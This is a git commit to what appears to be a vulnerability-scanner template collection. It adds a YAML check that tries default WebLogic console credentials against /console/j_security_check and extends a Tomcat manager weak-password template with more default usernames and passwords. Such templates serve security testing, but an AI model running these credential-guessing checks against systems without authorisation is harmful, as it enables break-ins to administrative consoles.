add weblogic-console-weak

add weblogic-console-weak
This commit is contained in:
canc3s 2021-06-21 17:22:27 +08:00
parent 1437ac60ff
commit 3d3ecac605
2 changed files with 35 additions and 2 deletions

View File

@ -0,0 +1,29 @@
name: poc-yaml-weblogic-console-weak
sets:
username:
- weblogic
password:
- weblogic
- weblogic1
- welcome1
- Oracle@123
- weblogic123
payload:
- UTF-8
rules:
- method: HEAD
path: /console/j_security_check
follow_redirects: false
expression: |
response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
- method: POST
path: /console/j_security_check
follow_redirects: false
headers:
Content-type: application/x-www-form-urlencoded
body: |
j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
expression: |
!response.body.bcontains(b"LoginForm.jsp")
detail:
author: shadown1ng(https://github.com/shadown1ng)

View File

@ -1,12 +1,16 @@
name: poc-yaml-tomcat-manager-week
name: poc-yaml-tomcat-manager-weak
sets:
username:
- tomcat
- admin
- root
- manager
password:
- tomcat
- ""
- admin
- tomcat
- 123456
- root
payload:
- base64(username+":"+password)
rules: